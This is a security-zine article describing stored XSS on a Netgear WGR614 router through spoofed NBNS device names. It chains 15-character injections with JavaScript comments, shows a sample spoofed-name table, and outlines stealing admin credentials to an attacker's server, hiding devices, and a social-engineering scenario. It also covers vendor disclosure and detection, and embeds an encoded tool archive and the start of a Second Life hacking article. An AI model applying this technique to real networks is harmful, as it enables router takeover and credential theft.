    https://github.com/simon-weber/XSS-over-NBNS
    for the most recent version. ]--

--[ Contents

    1 - Abstract

    2 - Test Device Background

    3 - Injection Chaining Technique

    4 - Device Specific Exploits
     4.1 - Steal Router Admin Credentials
     4.2 - Hide a Device on the Network

    5 - Tool

    6 - Fix, Detection and Prevention

    7 - Applications

    8 - References


--[ 1 - Abstract

For routers which:

        1) use NBNS to identify attached devices
        2) list these devices on their web admin interface
        3) do not sanitize the names they receive

there exists a 15 character injection vector on the web interface. This
vector can be exploited by anyone on the network, and will affect anyone
who visits a specific page on the web administration interface. Using
multiple injections in sequence separated with block comments, it is
possible to chain these injections to create a payload of arbitrary length.
This can be used to gain router admin credentials, steal cookies from an
admin, alter the view of attached devices, or perform any other XSS attack.

The real world application of the technique is limited by how often admins
are on the web interface. However, coupled with some social engineering,
small businesses such as coffee shops may be vulnerable.

--[ 2 - Test Device Background

I got a Netgear wgr614 v5 for less than $15 shipped on eBay. This is a
common home wireless B/G router. Originally released in 2004, its EOL was
about 5 years ago [1].

The web admin interface is pretty poorly built (sorry, Netgear!). If you
poke around, you'll find a lot of unescaped input fields to play with.
However, none of them can really be used to do anything interesting -
they're one time injection vectors that other users won't see.

However, there is one interesting page. This is the "attached devices" page
(DEV_devices.htm). It shows a table of what's connected to the router, and
looks something like this:

        #  Name        IP              MAC
        1  computer_1  192.168.1.2     07:E0:17:8F:11:2F
        2  computer_2  192.168.1.11    AF:3C:07:4D:B0:3A
        3     --       192.168.1.15    EB:3C:76:0F:67:43

This table is generated from the routing table, and the name is filled in
from NBNS responses to router requests. If a machine doesn't respond to
NBNS, takes too long to respond, or it gives an invalid name (over 15
characters or improperly terminated), the name is set to "--". The table is
refreshed in two ways: automatically by the router at an interval, and by a
user visiting or refreshing the page.

A quick test showed that the name in this table was unescaped. However,
this only gets us 15 characters of payload. I couldn't manage to squeeze a
reference to external code in just 15 characters (maybe someone else can?).
Executing arbitrary code will require something a bit more sophisticated.

--[ 3 - Injection Chaining Technique

The obvious way to get more characters for the payload is by chaining
together multiple injections. To do this, we need a few things:

    1) A way to make multiple entries in the table:
        This is easy, we just send out fake responses for IP/MAC
        combinations that don't already exist on the network.

    2) A way to control the order of our entries:
        Also easy: the table orders by IP address. We'll just use a
        range of incremental addresses that no one else is using.

    3) A way to chain our entries around the other html:
        Block comments will work for this. Our injections will just open
        and close block comments at the end and beginning of their
        reported names. For an illustration, imagine anything between <>
        will be ignored on the page, and our name injections are
        delimited with single quotes:

                      '[name 1] <' [ignored stuff]
    [ignored stuff] '> [name 2] <' [ignored stuff]
           ...      '> [name 3] <'      ...

Great, that was easy. What kind of block comments can we use? How about
html's?. This could work, but it has limitations. First off, -- or >
anywhere in the commented out html will break things. Even if this did
work, we'd have to be careful about where we split things, and the comments
would take up about half of a 15 char name.

Javascript's c-style block comments are smaller and more flexible. They can
come anywhere in code, so long as it isn't the middle of a token. For
example,

            document/* ignored */.write("something")

    is fine, while

            docu/* uh oh */ment.write("something")

    breaks things.

We also just need to avoid */ in the commented out html, which should be
much less likely to pop up than >. To use javascript block comments, we'll
obviously need to use javascript to get our payload onto the page. Call it
our "payload transporter". This will work just fine:

            "<script>document.write('[payload]');</script>"

So, then, the first thing to do is fit our transporter into 15 char chunks
to send as our first few fake NBNS names. Being careful not to split tokens
with comments, our first 3 names can be:

            <script>/*
            */document./*
            */write(/*

This will open the write command to inject our payload. Now we need to
package the payload into the transporter in some more 15 char chunks. Since
strings are tokens, we can't split one big string with block comments. We
need to split up the payload into multiple strings and introduce more
tokens between them. To do this, I leveraged the fact that document.write
can take multiple arguments, which it will write in order - the commas that
split parameters will be our extra tokens. String concatenation would work,
too. So, our payload will be packaged into the transporter like:

            'first part of payload', /*
            */ 'second part of payload', /*
            */ 'third part...', /*
                    ...
            */ ,'last part'); /*

It's easy to control the length of the strings to fit into the 15 char
length (we've just got to be careful about quotes in our payload). Lastly,
we just need to close the script tag, and we're done. We now have a way to
write an arbitrary length payload onto the attached devices page. Putting
it all together, here's an example of what our series of fake NBNS
responses could be if we wanted to get '<script>alert("test");</script>'
onto the page:

            Spoofed NBNS Name   IP               MAC
            <script>/*          192.168.1.111    00:00:00:00:00:01
            */document./*       192.168.1.112    00:00:00:00:00:02
            */write(/*          192.168.1.113    00:00:00:00:00:03
            */'<script>',/*     192.168.1.114    00:00:00:00:00:04
            */'alert(\'',/*     192.168.1.115    00:00:00:00:00:05
            */'test\');',/*     192.168.1.116    00:00:00:00:00:06
            */'</script',/*     192.168.1.117    00:00:00:00:00:07
            */'>');/*           192.168.1.118    00:00:00:00:00:08
            */</script>         192.168.1.119    00:00:00:00:00:09

There are a few other practical considerations that I found while working
with my specific Netgear router. It will use the most recent information it
has for device names. This means that we have to send our payload every
time that requests are sent out. It also means that for some time after we
stop injecting, the device listing is going to have a number of '--'
entries; the router is expecting to get names for these devices but sees no
response. To hide our tracks, we could reboot the router when finished
(this is possible by either injection or after stealing admin credentials,
which is detailed below).

We also have to be careful that a legitimate device doesn't come on to the
network with one of our spoofed IPs or MACs. This could possibly break our
injection, depending on the timing of responses.

One last thing to keep in mind: the NBNS packets need to get on the wire
quickly, since the router only listens for NBNS responses for a short time.
Thus, smaller payloads (which fit into less packets) are more likely to
succeed. You'll want to create external javascript to do any heavy lifting,
and just inject code to run it. When a payload fails, earlier packets will
get there and others won't, leaving garbage in the attached devices list.

--[ 4 - Device Specific Exploits

Naturally, anything that can be done with XSS or javascript is fair game.
You can attack the user (cookie stealing), the router (injected requests to
the web interface are now authed), or the page itself. I created a few
interesting examples that are specific to the Netgear device I had.

------[ 4.1 - Steal Router Admin Credentials

On the admin interface, there is an option to backup and restore the router
settings. It generates a simple flat file database called netgear.cfg. This
file itself is actually rather interesting. It seems to be a plaintext
memory dump, guarded from manipulation by a checksum that I couldn't figure
out (no one has cracked it as of the time this was written - if you do, let
me know). In it, you'll find everything from wireless keys to static routes
to - surprise - plaintext administrator information. This includes
usernames and passwords for both the http admin and telnet super admin (see
[3] for information on the hidden telnet console).

It's easy to steal this file via XSS in the same way that cookies are
stolen. The attacker first sets up a listening http server to receive the
information. Then, the injection code simply GETs the file and sends it off
to the listening server.

With admin access to the router, the attacker can do all sorts of things.
Basic traffic logging is built-in, and can even be emailed out
automatically. DoS is possible through the router's website blocking
functions. Man in the middle attacks are possible through the exposed dhcp
dns, static routing and internet connection configuration options.

------[ 4.2 - Hide a Device on the Network

The only place that an admin can get information about who is on the
network is right on the page we inject to. Manipulating the way the device
list is displayed could provide simple counter-detection against a
suspicious administrator.

For this exploit, we inject javascript to iterate through the table and
remove any row that matches a device we're interested in. Then, the table
is renumbered. Note that we don't have to own the device to remove it from
the list.

Going one step further, the attacker can bolster the cloak of invisibility.
Blocking connections not originating from the router is an obvious choice.
It might be wise to block pings directly from the router as well.

--[ 5 - Tool

I used Scapy with Python to implement the technique and exploits described
above and hosted it on Github [2]. You can also specify a custom exploit
that will be packaged and sent using my chaining technique. I also made a
simple python http server to listen for stolen admin credentials and serve
up external exploit code. Credit goes to Robert Wesley McGrew for NBNSpoof;
I reused some of his code [4].

To combat the problem I described earlier about sending packets quickly, I
listen for the first request from the router and precompute the response
packets to send. These will be sent as responses to any other requests
sniffed. You'll notice this if you use my tool; a "ready to inject" message
will be printed after the responses are generated.

If you look at my built-in exploits, you'll see they each use a loadhelp2
function as the entry point. This is just an easy way to get them to run
when the page is loaded. The router declares the loadhelp function
externally, and runs it on page load; I declare it on the page (so my
version is actually used), and use it to launch my external loadhelp2 code.
Then, the original code is patched on to the end, so the user doesn't
notice.

--[ 6 - Fix, Detection and Prevention

To close the hole, Netgear would only need to change some web backend code
in the firmware to escape NBNS names. I contacted Netgear about this. They
won't make a fix for this specific model - it already saw its support EOL -
but they are checking their newer models for this flaw as of September 2011
[1].

So, if you have this router, know that a fix isn't coming. While it may be
difficult to initially detect that a device you own is being attacked, once
you suspect it there are simple ways to verify it:

        check the source of the affected page; you'll see the commented
        out device entries with suspicious names

        use the hidden telnet interface. This will show the many fake
        IPs that are generated when packing a payload.

        as a last resort, watch network traffic for malformed NBNS names

Also, keep in mind that you can only be affected when checking your
router's configuration. You could protect yourself completely by never
visiting the web administration interface.

--[ 7 - Applications

Of course, this technique's practical application is limited to how often
users check their router admin pages. However, when coupled with some
social engineering, I could imagine a vulnerability for small businesses
like coffee shops.

These locations commonly offer wireless using off-the-shelf hardware like
my Netgear router. Getting on their network is easy - it's already open. At
this point, the attacker starts the exploit, then convinces an employee to
check the admin pages (maybe "I'm having some strange issues with the
wireless...Can you check on the router and see if my device is showing
up?"). I'm sure a practiced social engineer would have no trouble pulling
this off.

As far as applying this beyond the home networking realm, a good place to
start would be investigating this technique on other routers or better
firmwares like DD-WRT or Tomato. That would at least determine if this is a
common flaw. I didn't have another device to play with (the wgr614v5
doesn't work with other firmware), so I'll leave it for someone else to
try.

I'm doubtful that other applications very different from what I described
exist. Router administration pages simply aren't viewed very much. However,
the broader idea of XSS through spoofed NBNS names might be applicable to a
different domain. Anywhere there is a listing of NBNS names, there is the
possibility of an injection vector.

--[ 8 - References

[1]  private communication with Netgear, September 2011
[2]  https://github.com/simon-weber/XSS-over-NBNS
[3]  http://www.seattlewireless.net/NetgearWGR614#TelnetConsole
[4]  http://www.mcgrewsecurity.com/tools/nbnspoof/


                                           October 2011
                                           Simon Weber
                                           sweb090 _at_ gmail.com


begin 644 xss_over_nbns.tgz
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
2X,"!`P<.7A_^`BMJX<X`>```
`
end


|=[ 0x05 ]=---=[ Hacking the Second Life Viewer For Fun & Profit - Eva ]-=|

|=-----------------------------------------------------------------------=|
|=------------------------=[ 01110010011000010110 ]=---------------------=|
|=------------------------=[ 01100110010101101110 ]=---------------------=|
|=------------------------=[ 10010110111001110011 ]=---------------------=|
|=------------------------=[ 01110011011001010111 ]=---------------------=|
|=-----------------------------------------------------------------------=|

Index

------[ N. Preamble
------[ I. Part I - Objects
------[ II. Part II - Textures
            II. i. Textures - GLIntercept
------[ III. Postamble
------[ B. Bibliography
------[ A. Appendix

|=-----------------------------------------------------------------------=|

------[ N. Preamble

Second Life [1] is a virtual universe created by Linden Labs [2] which
allows custom content to be created by uploading different file formats. It
secures that content with a permission mask "Modify / Copy / Transfer",
which allows creators to protect their objects from being modified, copied
or transferred from avatar to avatar. The standard viewer at the time of
this writing is 2.x but the 1.x old codebase is still around and it is
still the most wide-spread one. Then, we have third party viewers, and
those are viewers forked off the 1.x codebase and then "extended" to modify
the UI and add features for convenience.

Second Life works on the principle of separately isolated servers called
SIMs (from, simulator, now recently renamed to "Regions") which are
interconnected to form grids. The reasoning is that, if one SIM goes down,
it will become unavailable but it will not take down the entire grid. A
grid is just a collection of individual SIMs (regions) bunched together.

Avatars are players that connect to the grid using a viewer and navigate
